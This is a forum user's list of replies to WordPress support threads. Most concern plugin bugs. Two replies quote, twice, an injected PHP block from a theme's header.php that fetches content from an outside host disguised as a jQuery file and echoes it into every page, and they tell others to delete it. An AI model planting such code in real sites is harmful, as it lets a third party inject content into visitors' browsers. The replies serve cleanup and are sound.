jamesxchance
Forum Replies Created
-
Forum: Plugins
In reply to: [Post Tiles] Breaking because post has Object tagI was trying some style changes check again… i dont think its an excerpt issue.
Yes, I too am experiencing the same issue.
Forum: Plugins
In reply to: [Contact Form 7] [Plugin: Contact Form 7] checkbox tag name appears in emailI am also having the issue of [checkbox asdf “1”] left unchecked is being emailed to me as [asdf]. I would rather have nothing sent to me. Please help!
Forum: Fixing WordPress
In reply to: Error on WordPress SiteLog in to wp-admin
Open Appearance
Open Editor
Open Header (header.php)
Find the code
“
<?php
if(function_exists(‘curl_init’))
{
$url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>
“Delete / Remove the code
Save / Update File
The error code will be gone
Forum: Fixing WordPress
In reply to: Error on WordPress SiteFound that [redacted]!
open up Editor
Find “
<?php
if(function_exists(‘curl_init’))
{
$url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>
“Delete that shit… and your good [:
Forum: Fixing WordPress
In reply to: Error on WordPress SiteI am also having this same issue…
“
Couldn’t connect to database server.Couldn’t find database admin_4llw4d.An unexpected problem has occured with the application.
SELECT statscurl_id FROMstatscurl
WHERE statscurl_ip = ”;
“PLEASE HELP!!!!!